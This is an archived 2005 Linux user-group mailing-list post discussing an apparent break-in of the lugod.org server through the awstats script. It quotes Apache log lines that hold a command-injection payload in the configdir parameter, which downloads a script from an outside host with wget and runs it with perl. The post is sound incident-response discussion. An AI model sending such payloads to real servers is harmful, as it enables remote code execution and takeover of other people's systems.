[vox-tech] lugod.org cracked?
Karsten M. Self
kmself at ix.netcom.com
Wed Feb 16 04:21:45 PST 2005
on Tue, Feb 15, 2005 at 02:35:49PM -0800, Rod Roark (rod at sunsetsystems.com) wrote:
> I think I found the point of entry. From the lugod.org
> apache log:
>
> 65.2.252.155 - - [14/Feb/2005:19:31:37 -0800] "POST /awstats/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;wget%20www.commandt.org/a;perl%20a;%20rm%20a;ec
> ho%20;echo| HTTP/1.0" 200 525 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
> 65.2.252.155 - - [14/Feb/2005:19:31:37 -0800] "POST /awstats/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;wget%20www.commandt.org/a;perl%20a;%20rm%20a;ec
> ho%20;echo| HTTP/1.0" 200 525 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
>
awstats was a PoE for a system I have occasional use of. You might want
to Google for / ask about Rick Moen's discovery of global variables in
PHP. Discussion on the BAD (Bay Area Debian) list.
Peace.
--
Karsten M. Self <kmself at ix.netcom.com> http://kmself.home.netcom.com/
What Part of "Gestalt" don't you understand?
They caused it themselves.
- Dick Cheney, greedy oil man lying bastard, blaming California for the
Enron-engineered, White House-blessed power crunch, reported by AP.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: Digital signature
Url : http://ns1.livepenguin.com/pipermail/vox-tech/attachments/20050216/b0441300/attachment.bin
More information about the vox-tech
mailing list